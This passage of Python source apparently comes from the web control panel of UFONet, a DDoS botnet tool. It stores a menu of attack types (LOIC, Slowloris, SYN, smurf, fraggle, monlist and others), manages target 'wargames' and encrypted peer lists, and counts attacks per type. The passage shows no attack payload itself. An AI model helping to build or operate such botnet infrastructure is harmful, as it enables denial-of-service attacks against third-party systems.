  4209. supply_sniper = pGet["sniper"]
  4210. supply_ufoack = pGet["ufoack"]
  4211. supply_uforst = pGet["uforst"]
  4212. supply_droper = pGet["droper"]
  4213. supply_overlap = pGet["overlap"]
  4214. supply_pinger = pGet["pinger"]
  4215. supply_ufoudp = pGet["ufoudp"]
  4216. except: # default global supply army
  4217. supply_botnet = 1
  4218. supply_loic = 0
  4219. supply_loris = 0
  4220. supply_ufosyn = 0
  4221. supply_spray = 0
  4222. supply_smurf = 0
  4223. supply_xmas = 0
  4224. supply_nuke = 0
  4225. supply_tachyon = 0
  4226. supply_monlist = 0
  4227. supply_fraggle = 0
  4228. supply_sniper = 0
  4229. supply_ufoack = 0
  4230. supply_uforst = 0
  4231. supply_droper = 0
  4232. supply_overlap = 0
  4233. supply_pinger = 0
  4234. supply_ufoudp = 0
  4235. with open(self.mothership_supplycfg_file, "w") as f:
  4236. json.dump({"botnet": supply_botnet, "loic": supply_loic, "loris": supply_loris, "ufosyn": supply_ufosyn, "spray": supply_spray, "smurf": supply_smurf, "xmas": supply_xmas, "nuke": supply_nuke, "tachyon": supply_tachyon, "monlist": supply_monlist, "fraggle": supply_fraggle, "sniper": supply_sniper, "ufoack": supply_ufoack, "uforst": supply_uforst, "droper": supply_droper, "overlap": supply_overlap, "pinger": supply_pinger, "ufoudp": supply_ufoudp}, f, indent=4)
  4237. if page == "/cmd_job_add":
  4238. self.pages["/cmd_job_add"] = "<pre>Adding wargame to your list...</pre>"
  4239. try:
  4240. job_params = pGet["id"]
  4241. sep = ","
  4242. job_id = job_params.rsplit(sep, 1)[0]
  4243. except:
  4244. job_id = ""
  4245. if job_id is not "":
  4246. self.list_wargames.reverse()
  4247. try:
  4248. job_task = self.list_wargames[(int(job_id)-1)]
  4249. f = open(self.wargames_file,"r")
  4250. ls = f.readlines()
  4251. f.close()
  4252. f = open(self.wargames_file,"w")
  4253. sep = wargames_msg_sep
  4254. for l in ls:
  4255. if str(l) != str(job_task):
  4256. f.write(l)
  4257. else:
  4258. job_t2 = job_task.rsplit(sep, 1)[0]
  4259. job_creation = job_t2.rsplit(sep, 1)[0]
  4260. job_target = job_t2.rsplit(sep, 1)[1]
  4261. job_estimated = job_task.rsplit(sep, 1)[1]
  4262. l = str(job_creation) + wargames_msg_sep + str(job_target) + "!!!#-#" + str(job_estimated) # '!!!' target marked as job
  4263. f.write(l)
  4264. f.close()
  4265. except:
  4266. pass
  4267. if page == "/cmd_job_add_update":
  4268. if not os.path.exists('/tmp/out'):
  4269. open('/tmp/out', 'w').close()
  4270. with open('/tmp/out', 'r') as f:
  4271. self.pages["/cmd_job_add_update"] = "<pre>"+f.read()+"<pre>"
  4272. if page == "/cmd_job_add_all":
  4273. self.pages["/cmd_job_add_all"] = "<pre>Engaging ALL -ONGOING- wargames... ;-)</pre>"
  4274. try:
  4275. self.list_wargames.reverse()
  4276. f = open(self.wargames_file,"r")
  4277. ls = f.readlines()
  4278. f.close()
  4279. f = open(self.wargames_file,"w")
  4280. sep = wargames_msg_sep
  4281. for l in ls:
  4282. job_t2 = l.rsplit(sep, 1)[0]
  4283. job_creation = job_t2.rsplit(sep, 1)[0]
  4284. job_target = job_t2.rsplit(sep, 1)[1]
  4285. job_estimated = l.rsplit(sep, 1)[1]
  4286. if not "!!!" in job_target:
  4287. l = str(job_creation) + wargames_msg_sep + str(job_target) + "!!!#-#" + str(job_estimated)
  4288. else:
  4289. l = str(job_creation) + wargames_msg_sep + str(job_target) + wargames_msg_sep + str(job_estimated)
  4290. f.write(l)
  4291. f.close()
  4292. except:
  4293. pass
  4294. if page == "/cmd_job_add_all_update":
  4295. if not os.path.exists('/tmp/out'):
  4296. open('/tmp/out', 'w').close()
  4297. with open('/tmp/out', 'r') as f:
  4298. self.pages["/cmd_job_add_all_update"] = "<pre>"+f.read()+"<pre>"
  4299. if page == "/cmd_job_cancel":
  4300. self.pages["/cmd_job_cancel"] = "<pre>Canceling wargame from your list...</pre>"
  4301. try:
  4302. job_params = pGet["id"]
  4303. sep = ","
  4304. job_id = job_params.rsplit(sep, 1)[0]
  4305. except:
  4306. job_id = ""
  4307. if job_id is not "":
  4308. self.list_wargames.reverse()
  4309. try:
  4310. job_task = self.list_wargames[(int(job_id)-1)]
  4311. f = open(self.wargames_file,"r")
  4312. ls = f.readlines()
  4313. f.close()
  4314. f = open(self.wargames_file,"w")
  4315. for l in ls:
  4316. if str(l) != str(job_task):
  4317. f.write(l)
  4318. else:
  4319. sep = wargames_msg_sep
  4320. job_t2 = job_task.rsplit(sep, 1)[0]
  4321. job_creation = job_t2.rsplit(sep, 1)[0]
  4322. job_target = job_t2.rsplit(sep, 1)[1]
  4323. job_target = job_target.replace("!!!","") # undo target marked as job (unjob)
  4324. job_estimated = job_task.rsplit(sep, 1)[1]
  4325. l = str(job_creation) + wargames_msg_sep + str(job_target) + wargames_msg_sep + str(job_estimated)
  4326. f.write(l)
  4327. f.close()
  4328. except:
  4329. pass
  4330. if page == "/cmd_job_cancel_update":
  4331. if not os.path.exists('/tmp/out'):
  4332. open('/tmp/out', 'w').close()
  4333. with open('/tmp/out', 'r') as f:
  4334. self.pages["/cmd_job_cancel_update"] = "<pre>"+f.read()+"<pre>"
  4335. if page == "/cmd_job_cancel_all":
  4336. self.pages["/cmd_job_cancel_all"] = "<pre>Canceling ALL -JOINED- wargames from your list...</pre>"
  4337. try:
  4338. self.list_wargames.reverse()
  4339. f = open(self.wargames_file,"r")
  4340. ls = f.readlines()
  4341. f.close()
  4342. f = open(self.wargames_file,"w")
  4343. sep = wargames_msg_sep
  4344. for l in ls:
  4345. job_t2 = l.rsplit(sep, 1)[0]
  4346. job_creation = job_t2.rsplit(sep, 1)[0]
  4347. job_target = job_t2.rsplit(sep, 1)[1]
  4348. job_target = job_target.replace("!!!","") # undo target marked as job (unjob)
  4349. job_estimated = l.rsplit(sep, 1)[1]
  4350. l = str(job_creation) + wargames_msg_sep + str(job_target) + wargames_msg_sep + str(job_estimated)
  4351. f.write(l)
  4352. f.close()
  4353. except:
  4354. pass
  4355. if page == "/cmd_job_cancel_all_update":
  4356. if not os.path.exists('/tmp/out'):
  4357. open('/tmp/out', 'w').close()
  4358. with open('/tmp/out', 'r') as f:
  4359. self.pages["/cmd_job_cancel_all_update"] = "<pre>"+f.read()+"<pre>"
  4360. if page == "/cmd_job_filter":
  4361. try:
  4362. job_filter = pGet["filter"]
  4363. job_key = pGet["key"]
  4364. except:
  4365. job_filter = "creation"
  4366. job_key = str(self.crypto_key)
  4367. self.pages["/cmd_job_filter"] = "<pre>Ordering wargames by: "+job_filter+"</pre>"
  4368. nodec_text = "KEY?"
  4369. try:
  4370. wargames_items=[]
  4371. with open(self.wargames_file) as f:
  4372. ls = f.read().splitlines()
  4373. f.close()
  4374. f = open(self.wargames_file,"w")
  4375. for j in ls:
  4376. if wargames_msg_sep in j:
  4377. m = j.split(wargames_msg_sep)
  4378. wargames_creation = m[0] # creation date
  4379. self.decrypt(job_key, wargames_creation)
  4380. if self.decryptedtext:
  4381. wargames_creation = self.decryptedtext
  4382. else:
  4383. wargames_creation = nodec_text
  4384. self.decryptedtext = "" # clean decryptedtext buffer
  4385. wargames_target = m[1] # target
  4386. self.decrypt(job_key, wargames_target)
  4387. if self.decryptedtext:
  4388. wargames_target = self.decryptedtext
  4389. if wargames_target.startswith("www."):
  4390. wargames_target = wargames_target.replace("www.","")
  4391. else:
  4392. wargames_target = nodec_text
  4393. self.decryptedtext = "" # clean decryptedtext buffer
  4394. wargames_estimated = m[2] # estimated date
  4395. self.decrypt(job_key, wargames_estimated)
  4396. if self.decryptedtext:
  4397. wargames_estimated = self.decryptedtext
  4398. else:
  4399. wargames_estimated = nodec_text
  4400. self.decryptedtext = "" # clean decryptedtext buffer
  4401. wargames_creation = strptime(wargames_creation, "%d-%m-%Y %H:%M:%S")
  4402. wargames_estimated = strptime(wargames_estimated, "%d-%m-%Y %H:%M:%S")
  4403. wargames_items.append([wargames_creation,wargames_target,wargames_estimated])
  4404. if job_filter == "creation":
  4405. wargames_items=sorted(wargames_items,key=lambda x:x[0]) # sorted by creation
  4406. elif job_filter == "target":
  4407. wargames_items=sorted(wargames_items,key=lambda x:x[1]) # sorted by target
  4408. elif job_filter == "estimated":
  4409. wargames_items=sorted(wargames_items,key=lambda x:x[2]) # sorted by estimated
  4410. else:
  4411. wargames_items=sorted(wargames_items,key=lambda x:x[0]) # sorted by creation
  4412. for i in wargames_items:
  4413. wargames_creation = i[0]
  4414. wargames_creation = strftime("%d-%m-%Y %H:%M:%S", wargames_creation)
  4415. self.encrypt(job_key, wargames_creation)
  4416. if self.encryptedtext:
  4417. wargames_creation = self.encryptedtext
  4418. self.encryptedtext = "" # clean encryptedtext buffer
  4419. wargames_target = str(i[1])
  4420. self.encrypt(job_key, wargames_target)
  4421. if self.encryptedtext:
  4422. wargames_target = self.encryptedtext
  4423. self.encryptedtext = "" # clean encryptedtext buffer
  4424. wargames_estimated = i[2]
  4425. wargames_estimated = strftime("%d-%m-%Y %H:%M:%S", wargames_estimated)
  4426. self.encrypt(job_key, wargames_estimated)
  4427. if self.encryptedtext:
  4428. wargames_estimated = self.encryptedtext
  4429. self.encryptedtext = "" # clean encryptedtext buffer
  4430. l = str(wargames_creation) + wargames_msg_sep + str(wargames_target) + wargames_msg_sep + str(wargames_estimated)
  4431. f.write(l + os.linesep)
  4432. f.close()
  4433. except:
  4434. pass
  4435. if page == "/cmd_job_filter_update":
  4436. if not os.path.exists('/tmp/out'):
  4437. open('/tmp/out', 'w').close()
  4438. with open('/tmp/out', 'r') as f:
  4439. self.pages["/cmd_job_filter_update"] = "<pre>"+f.read()+"<pre>"
  4440. if page == "/cmd_link_filter":
  4441. try:
  4442. link_filter = pGet["filter"]
  4443. link_key = pGet["key"]
  4444. except:
  4445. link_filter = "creation"
  4446. link_key = str(self.crypto_key)
  4447. self.pages["/cmd_link_filter"] = "<pre>Ordering links by: "+link_filter+"</pre>"
  4448. nodec_text = "KEY?"
  4449. try:
  4450. links_items=[]
  4451. with open(self.links_file) as f:
  4452. ls = f.read().splitlines()
  4453. f.close()
  4454. f = open(self.links_file,"w")
  4455. for j in ls:
  4456. if links_msg_sep in j:
  4457. m = j.split(links_msg_sep)
  4458. link_creation = m[0] # creation date
  4459. self.decrypt(link_key, link_creation)
  4460. if self.decryptedtext:
  4461. link_creation = self.decryptedtext
  4462. else:
  4463. link_creation = nodec_text
  4464. self.decryptedtext = "" # clean decryptedtext buffer
  4465. link_url = m[1] # url
  4466. self.decrypt(link_key, link_url)
  4467. if self.decryptedtext:
  4468. link_url = self.decryptedtext
  4469. if link_url.startswith("www."):
  4470. link_url = link_url.replace("www.","")
  4471. else:
  4472. link_url = nodec_text
  4473. self.decryptedtext = "" # clean decryptedtext buffer
  4474. link_topic = m[2] # topic
  4475. self.decrypt(link_key, link_topic)
  4476. if self.decryptedtext:
  4477. link_topic = self.decryptedtext
  4478. else:
  4479. link_topic = nodec_text
  4480. self.decryptedtext = "" # clean decryptedtext buffer
  4481. link_creation = strptime(link_creation, "%d-%m-%Y %H:%M:%S")
  4482. links_items.append([link_creation,link_url,link_topic])
  4483. if link_filter == "creation":
  4484. links_items=sorted(links_items,key=lambda x:x[0]) # sorted by creation
  4485. elif link_filter == "url":
  4486. links_items=sorted(links_items,key=lambda x:x[1]) # sorted by url
  4487. elif link_filter == "topic":
  4488. links_items=sorted(links_items,key=lambda x:x[2]) # sorted by topic
  4489. else:
  4490. links_items=sorted(links_items,key=lambda x:x[0]) # sorted by creation
  4491. for i in links_items:
  4492. link_creation = i[0]
  4493. link_creation = strftime("%d-%m-%Y %H:%M:%S", link_creation)
  4494. self.encrypt(link_key, link_creation)
  4495. if self.encryptedtext:
  4496. link_creation = self.encryptedtext
  4497. else:
  4498. link_creation = nodec_text
  4499. self.encryptedtext = "" # clean encryptedtext buffer
  4500. link_url = str(i[1])
  4501. self.encrypt(link_key, link_url)
  4502. if self.encryptedtext:
  4503. link_url = self.encryptedtext
  4504. else:
  4505. link_url = nodec_text
  4506. self.encryptedtext = "" # clean encryptedtext buffer
  4507. link_topic = str(i[2])
  4508. self.encrypt(link_key, link_topic)
  4509. if self.encryptedtext:
  4510. link_topic = self.encryptedtext
  4511. else:
  4512. link_topic = nodec_text
  4513. self.encryptedtext = "" # clean encryptedtext buffer
  4514. l = str(link_creation) + links_msg_sep + str(link_url) + links_msg_sep + str(link_topic)
  4515. f.write(l + os.linesep)
  4516. f.close()
  4517. except:
  4518. pass
  4519. if page == "/cmd_link_filter_update":
  4520. if not os.path.exists('/tmp/out'):
  4521. open('/tmp/out', 'w').close()
  4522. with open('/tmp/out', 'r') as f:
  4523. self.pages["/cmd_link_filter_update"] = "<pre>"+f.read()+"<pre>"
  4524. if page == "/cmd_stream_filter":
  4525. try:
  4526. stream_filter = pGet["filter"]
  4527. stream_key = pGet["key"]
  4528. except:
  4529. stream_filter = "creation"
  4530. stream_key = str(self.crypto_key)
  4531. self.pages["/cmd_stream_filter"] = "<pre>Ordering streams by: "+stream_filter+"</pre>"
  4532. nodec_text = "KEY?"
  4533. try:
  4534. streams_items=[]
  4535. with open(self.streams_file) as f:
  4536. ls = f.read().splitlines()
  4537. f.close()
  4538. f = open(self.streams_file,"w")
  4539. for j in ls:
  4540. if streams_msg_sep in j:
  4541. m = j.split(streams_msg_sep)
  4542. stream_creation = m[0] # creation date
  4543. self.decrypt(stream_key, stream_creation)
  4544. if self.decryptedtext:
  4545. stream_creation = self.decryptedtext
  4546. else:
  4547. stream_creation = nodec_text
  4548. self.decryptedtext = "" # clean decryptedtext buffer
  4549. stream_url = m[1] # url
  4550. self.decrypt(stream_key, stream_url)
  4551. if self.decryptedtext:
  4552. stream_url = self.decryptedtext
  4553. if stream_url.startswith("www."):
  4554. stream_url = stream_url.replace("www.","")
  4555. else:
  4556. stream_url = nodec_text
  4557. self.decryptedtext = "" # clean decryptedtext buffer
  4558. stream_topic = m[2] # topic
  4559. self.decrypt(stream_key, stream_topic)
  4560. if self.decryptedtext:
  4561. stream_topic = self.decryptedtext
  4562. else:
  4563. stream_topic = nodec_text
  4564. self.decryptedtext = "" # clean decryptedtext buffer
  4565. stream_creation = strptime(stream_creation, "%d-%m-%Y %H:%M:%S")
  4566. streams_items.append([stream_creation,stream_url,stream_topic])
  4567. if stream_filter == "creation":
  4568. streams_items=sorted(streams_items,key=lambda x:x[0]) # sorted by creation
  4569. elif stream_filter == "url":
  4570. streams_items=sorted(streams_items,key=lambda x:x[1]) # sorted by url
  4571. elif stream_filter == "topic":
  4572. streams_items=sorted(streams_items,key=lambda x:x[2]) # sorted by topic
  4573. else:
  4574. streams_items=sorted(streams_items,key=lambda x:x[0]) # sorted by creation
  4575. for i in streams_items:
  4576. stream_creation = i[0]
  4577. stream_creation = strftime("%d-%m-%Y %H:%M:%S", stream_creation)
  4578. self.encrypt(stream_key, stream_creation)
  4579. if self.encryptedtext:
  4580. stream_creation = self.encryptedtext
  4581. else:
  4582. stream_creation = nodec_text
  4583. self.encryptedtext = "" # clean encryptedtext buffer
  4584. stream_url = str(i[1])
  4585. self.encrypt(stream_key, stream_url)
  4586. if self.encryptedtext:
  4587. stream_url = self.encryptedtext
  4588. else:
  4589. stream_url = nodec_text
  4590. self.encryptedtext = "" # clean encryptedtext buffer
  4591. stream_topic = str(i[2])
  4592. self.encrypt(stream_key, stream_topic)
  4593. if self.encryptedtext:
  4594. stream_topic = self.encryptedtext
  4595. else:
  4596. stream_topic = nodec_text
  4597. self.encryptedtext = "" # clean encryptedtext buffer
  4598. l = str(stream_creation) + streams_msg_sep + str(stream_url) + streams_msg_sep + str(stream_topic)
  4599. f.write(l + os.linesep)
  4600. f.close()
  4601. except:
  4602. pass
  4603. if page == "/cmd_stream_filter_update":
  4604. if not os.path.exists('/tmp/out'):
  4605. open('/tmp/out', 'w').close()
  4606. with open('/tmp/out', 'r') as f:
  4607. self.pages["/cmd_stream_filter_update"] = "<pre>"+f.read()+"<pre>"
  4608. if page == "/cmd_globalnet_filter":
  4609. try:
  4610. globalnet_filter = pGet["filter"]
  4611. globalnet_key = pGet["key"]
  4612. except:
  4613. globalnet_filter = "owner"
  4614. globalnet_key = str(self.crypto_key)
  4615. self.pages["/cmd_globalnet_filter"] = "<pre>Ordering Global.Net by: "+globalnet_filter+"</pre>"
  4616. nodec_text = "KEY?"
  4617. try:
  4618. globalnet_items=[]
  4619. with open(self.globalnet_file) as f:
  4620. ls = f.read().splitlines()
  4621. f.close()
  4622. f = open(self.globalnet_file,"w")
  4623. for j in ls:
  4624. if globalnet_msg_sep in j:
  4625. m = j.split(globalnet_msg_sep)
  4626. globalnet_owner = m[0] # owner
  4627. self.decrypt(globalnet_key, globalnet_owner)
  4628. if self.decryptedtext:
  4629. globalnet_owner = self.decryptedtext
  4630. else:
  4631. globalnet_owner = nodec_text
  4632. self.decryptedtext = "" # clean decryptedtext buffer
  4633. globalnet_comment = m[1] # comment
  4634. self.decrypt(globalnet_key, globalnet_comment)
  4635. if self.decryptedtext:
  4636. globalnet_comment = self.decryptedtext
  4637. else:
  4638. globalnet_comment = nodec_text
  4639. self.decryptedtext = "" # clean decryptedtext buffer
  4640. globalnet_warp = m[2] # warp
  4641. self.decrypt(globalnet_key, globalnet_warp)
  4642. if self.decryptedtext:
  4643. globalnet_warp = self.decryptedtext
  4644. else:
  4645. globalnet_warp = nodec_text
  4646. self.decryptedtext = "" # clean decryptedtext buffer
  4647. globalnet_ip = m[3] # ip
  4648. self.decrypt(globalnet_key, globalnet_ip)
  4649. if self.decryptedtext:
  4650. globalnet_ip = self.decryptedtext
  4651. else:
  4652. globalnet_ip = nodec_text
  4653. self.decryptedtext = "" # clean decryptedtext buffer
  4654. globalnet_items.append([globalnet_owner,globalnet_comment,globalnet_warp,globalnet_ip])
  4655. if globalnet_filter == "owner":
  4656. globalnet_items=sorted(globalnet_items,key=lambda x:x[0]) # sorted by owner
  4657. elif globalnet_filter == "comment":
  4658. globalnet_items=sorted(globalnet_items,key=lambda x:x[1]) # sorted by comment
  4659. elif globalnet_filter == "warp":
  4660. globalnet_items=sorted(globalnet_items,key=lambda x:x[2]) # sorted by warp
  4661. elif globalnet_filter == "ip":
  4662. globalnet_items=sorted(globalnet_items,key=lambda x:x[3]) # sorted by ip
  4663. else:
  4664. globalnet_items=sorted(globalnet_items,key=lambda x:x[0]) # sorted by owner
  4665. for i in globalnet_items:
  4666. globalnet_owner = str(i[0])
  4667. self.encrypt(globalnet_key, globalnet_owner)
  4668. if self.encryptedtext:
  4669. globalnet_owner = self.encryptedtext
  4670. else:
  4671. globalnet_owner = nodec_text
  4672. self.encryptedtext = "" # clean encryptedtext buffer
  4673. globalnet_comment = str(i[1])
  4674. self.encrypt(globalnet_key, globalnet_comment)
  4675. if self.encryptedtext:
  4676. globalnet_comment = self.encryptedtext
  4677. else:
  4678. globalnet_comment = nodec_text
  4679. self.encryptedtext = "" # clean encryptedtext buffer
  4680. globalnet_warp = str(i[2])
  4681. self.encrypt(globalnet_key, globalnet_warp)
  4682. if self.encryptedtext:
  4683. globalnet_warp = self.encryptedtext
  4684. else:
  4685. globalnet_warp = nodec_text
  4686. self.encryptedtext = "" # clean encryptedtext buffer
  4687. globalnet_ip = str(i[3])
  4688. self.encrypt(globalnet_key, globalnet_ip)
  4689. if self.encryptedtext:
  4690. globalnet_ip = self.encryptedtext
  4691. else:
  4692. globalnet_ip = nodec_text
  4693. self.encryptedtext = "" # clean encryptedtext buffer
  4694. l = str(globalnet_owner) + globalnet_msg_sep + str(globalnet_comment) + globalnet_msg_sep + str(globalnet_warp) + globalnet_msg_sep + str(globalnet_ip)
  4695. f.write(l + os.linesep)
  4696. f.close()
  4697. except:
  4698. pass
  4699. if page == "/cmd_globalnet_filter_update":
  4700. if not os.path.exists('/tmp/out'):
  4701. open('/tmp/out', 'w').close()
  4702. with open('/tmp/out', 'r') as f:
  4703. self.pages["/cmd_globalnet_filter_update"] = "<pre>"+f.read()+"<pre>"
  4704. if page == "/cmd_grid_filter":
  4705. try:
  4706. grid_filter = pGet["filter"]
  4707. grid_key = pGet["key"]
  4708. except:
  4709. grid_filter = "missions" # default grid order by
  4710. grid_key = str(self.crypto_key)
  4711. self.pages["/cmd_grid_filter"] = "<pre>Ordering grid by: "+grid_filter+"</pre>"
  4712. nodec_text = "KEY?"
  4713. nodec_num = 0
  4714. try:
  4715. grid_items=[]
  4716. with open(self.grid_file) as f:
  4717. ls = f.read().splitlines()
  4718. f.close()
  4719. f = open(self.grid_file,"w")
  4720. for j in ls:
  4721. if grid_msg_sep in j:
  4722. version = j.count(grid_msg_sep) # check UFONet stream version (10->0.9|11->1.0|12->1.1|13->1.2)
  4723. m = j.split(grid_msg_sep)
  4724. grid_nickname = m[0] # nickname
  4725. self.decrypt(grid_key, grid_nickname)
  4726. if self.decryptedtext:
  4727. grid_nickname = str(self.decryptedtext)
  4728. else:
  4729. grid_nickname = nodec_text
  4730. self.decryptedtext = "" # clean decryptedtext buffer
  4731. grid_ranking = m[1] # ranking
  4732. self.decrypt(grid_key, grid_ranking)
  4733. if self.decryptedtext:
  4734. try:
  4735. grid_ranking = int(self.decryptedtext)
  4736. except:
  4737. grid_ranking = nodec_num
  4738. else:
  4739. grid_ranking = nodec_num
  4740. self.decryptedtext = "" # clean decryptedtext buffer
  4741. grid_totalchargo = m[2] # total chargo
  4742. self.decrypt(grid_key, grid_totalchargo)
  4743. if self.decryptedtext:
  4744. try:
  4745. grid_totalchargo = int(self.decryptedtext)
  4746. except:
  4747. grid_totalchargo = nodec_num
  4748. else:
  4749. grid_totalchargo = nodec_num
  4750. self.decryptedtext = "" # clean decryptedtext buffer
  4751. grid_dorking = m[3] # dorking
  4752. self.decrypt(grid_key, grid_dorking)
  4753. if self.decryptedtext:
  4754. try:
  4755. grid_dorking = int(self.decryptedtext)
  4756. except:
  4757. grid_dorking = nodec_num
  4758. else:
  4759. grid_dorking = nodec_num
  4760. self.decryptedtext = "" # clean decryptedtext buffer
  4761. grid_transferred = m[4] # transferred
  4762. self.decrypt(grid_key, grid_transferred)
  4763. if self.decryptedtext:
  4764. try:
  4765. grid_transferred = int(self.decryptedtext)
  4766. except:
  4767. grid_transferred = nodec_num
  4768. else:
  4769. grid_transferred = nodec_num
  4770. self.decryptedtext = "" # clean decryptedtext buffer
  4771. grid_maxchargo = m[5] # maxchargo
  4772. self.decrypt(grid_key, grid_maxchargo)
  4773. if self.decryptedtext:
  4774. try:
  4775. grid_maxchargo = int(self.decryptedtext)
  4776. except:
  4777. grid_maxchargo = nodec_num
  4778. else:
  4779. grid_maxchargo = nodec_num
  4780. self.decryptedtext = "" # clean decryptedtext buffer
  4781. grid_missions = m[6] # missions
  4782. self.decrypt(grid_key, grid_missions)
  4783. if self.decryptedtext:
  4784. try:
  4785. grid_missions = int(self.decryptedtext)
  4786. except:
  4787. grid_missions = nodec_num
  4788. else:
  4789. grid_missions = nodec_num
  4790. self.decryptedtext = "" # clean decryptedtext buffer
  4791. grid_attacks = m[7] # attacks
  4792. self.decrypt(grid_key, grid_attacks)
  4793. if self.decryptedtext:
  4794. try:
  4795. grid_attacks = int(self.decryptedtext)
  4796. except:
  4797. grid_attacks = nodec_num
  4798. else:
  4799. grid_attacks = nodec_num
  4800. self.decryptedtext = "" # clean decryptedtext buffer
  4801. grid_loic = m[8] # loic
  4802. self.decrypt(grid_key, grid_loic)
  4803. if self.decryptedtext:
  4804. try:
  4805. grid_loic = int(self.decryptedtext)
  4806. except:
  4807. grid_loic = nodec_num
  4808. else:
  4809. grid_loic = nodec_num
  4810. if version > 17 or version == 17 or version == 16 or version == 15 or version == 12 or version == 11:
  4811. grid_loris = m[9] # loris
  4812. self.decrypt(grid_key, grid_loris)
  4813. if self.decryptedtext:
  4814. try:
  4815. grid_loris = int(self.decryptedtext)
  4816. except:
  4817. grid_loris = nodec_num
  4818. else:
  4819. grid_loris = nodec_num
  4820. self.decryptedtext = "" # clean decryptedtext buffer
  4821. else:
  4822. grid_loris = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not loris present
  4823. self.decrypt(grid_key, grid_loris)
  4824. if self.decryptedtext:
  4825. try:
  4826. grid_loris = int(self.decryptedtext)
  4827. except:
  4828. grid_loris = nodec_num
  4829. else:
  4830. grid_loris = nodec_num
  4831. self.decryptedtext = "" # clean decryptedtext buffer
  4832. if version > 17 or version == 17 or version == 16 or version == 15 or version == 12:
  4833. grid_ufosyn = m[10] # ufosyn
  4834. self.decrypt(grid_key, grid_ufosyn)
  4835. if self.decryptedtext:
  4836. try:
  4837. grid_ufosyn = int(self.decryptedtext)
  4838. except:
  4839. grid_ufosyn = nodec_num
  4840. else:
  4841. grid_ufosyn = nodec_num
  4842. self.decryptedtext = "" # clean decryptedtext buffer
  4843. else:
  4844. grid_ufosyn = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not ufosyn present
  4845. self.decrypt(grid_key, grid_ufosyn)
  4846. if self.decryptedtext:
  4847. try:
  4848. grid_ufosyn = int(self.decryptedtext)
  4849. except:
  4850. grid_ufosyn = nodec_num
  4851. else:
  4852. grid_ufosyn = nodec_num
  4853. self.decryptedtext = "" # clean decryptedtext buffer
  4854. if version > 17 or version == 17 or version == 16 or version == 15:
  4855. grid_spray = m[11] # spray
  4856. self.decrypt(grid_key, grid_spray)
  4857. if self.decryptedtext:
  4858. try:
  4859. grid_spray = int(self.decryptedtext)
  4860. except:
  4861. grid_spray = nodec_num
  4862. else:
  4863. grid_spray = nodec_num
  4864. self.decryptedtext = "" # clean decryptedtext buffer
  4865. else:
  4866. grid_spray = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not spray present
  4867. self.decrypt(grid_key, grid_spray)
  4868. if self.decryptedtext:
  4869. try:
  4870. grid_spray = int(self.decryptedtext)
  4871. except:
  4872. grid_spray = nodec_num
  4873. else:
  4874. grid_spray = nodec_num
  4875. self.decryptedtext = "" # clean decryptedtext buffer
  4876. if version > 17 or version == 17 or version == 16 or version == 15:
  4877. grid_smurf = m[12] # smurf
  4878. self.decrypt(grid_key, grid_smurf)
  4879. if self.decryptedtext:
  4880. try:
  4881. grid_smurf = int(self.decryptedtext)
  4882. except:
  4883. grid_smurf = nodec_num
  4884. else:
  4885. grid_smurf = nodec_num
  4886. self.decryptedtext = "" # clean decryptedtext buffer
  4887. else:
  4888. grid_smurf = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not smurf present
  4889. self.decrypt(grid_key, grid_smurf)
  4890. if self.decryptedtext:
  4891. try:
  4892. grid_smurf = int(self.decryptedtext)
  4893. except:
  4894. grid_smurf = nodec_num
  4895. else:
  4896. grid_smurf = nodec_num
  4897. self.decryptedtext = "" # clean decryptedtext buffer
  4898. if version > 17 or version == 17 or version == 16 or version == 15:
  4899. grid_xmas = m[13] # xmas
  4900. self.decrypt(grid_key, grid_xmas)
  4901. if self.decryptedtext:
  4902. try:
  4903. grid_xmas = int(self.decryptedtext)
  4904. except:
  4905. grid_xmas = nodec_num
  4906. else:
  4907. grid_xmas = nodec_num
  4908. self.decryptedtext = "" # clean decryptedtext buffer
  4909. else:
  4910. grid_xmas = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not xmas present
  4911. self.decrypt(grid_key, grid_xmas)
  4912. if self.decryptedtext:
  4913. try:
  4914. grid_xmas = int(self.decryptedtext)
  4915. except:
  4916. grid_xmas = nodec_num
  4917. else:
  4918. grid_xmas = nodec_num
  4919. self.decryptedtext = "" # clean decryptedtext buffer
  4920. if version > 17 or version == 17 or version == 16:
  4921. grid_nuke = m[14] # nuke
  4922. self.decrypt(grid_key, grid_nuke)
  4923. if self.decryptedtext:
  4924. try:
  4925. grid_nuke = int(self.decryptedtext)
  4926. except:
  4927. grid_nuke = nodec_num
  4928. else:
  4929. grid_nuke = nodec_num
  4930. self.decryptedtext = "" # clean decryptedtext buffer
  4931. else:
  4932. grid_nuke = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not nuke present
  4933. self.decrypt(grid_key, grid_nuke)
  4934. if self.decryptedtext:
  4935. try:
  4936. grid_nuke = int(self.decryptedtext)
  4937. except:
  4938. grid_nuke = nodec_num
  4939. else:
  4940. grid_nuke = nodec_num
  4941. self.decryptedtext = "" # clean decryptedtext buffer
  4942. if version > 17 or version == 17:
  4943. grid_tachyon = m[15] # tachyon
  4944. self.decrypt(grid_key, grid_tachyon)
  4945. if self.decryptedtext:
  4946. try:
  4947. grid_tachyon = int(self.decryptedtext)
  4948. except:
  4949. grid_tachyon = nodec_num
  4950. else:
  4951. grid_tachyon = nodec_num
  4952. self.decryptedtext = "" # clean decryptedtext buffer
  4953. else:
  4954. grid_tachyon = str("2OwgWPTsDw8k6f6sgnGLOw8vAb1PSrs+NkeLNPxEyJO3ahKV0Q==") # not tachyon present
  4955. self.decrypt(grid_key, grid_tachyon)
  4956. if self.decryptedtext:
  4957. try:
  4958. grid_tachyon = int(self.decryptedtext)
  4959. except:
  4960. grid_tachyon = nodec_num
  4961. else:
  4962. grid_tachyon = nodec_num
  4963. self.decryptedtext = "" # clean decryptedtext buffer
  4964. if version > 17: # current version = 26
  4965. grid_monlist = m[16] # monlist
  4966. self.decrypt(grid_key, grid_monlist)
  4967. if self.decryptedtext:
  4968. try:
  4969. grid_monlist = int(self.decryptedtext)
  4970. except:
  4971. grid_monlist = nodec_num
  4972. else:
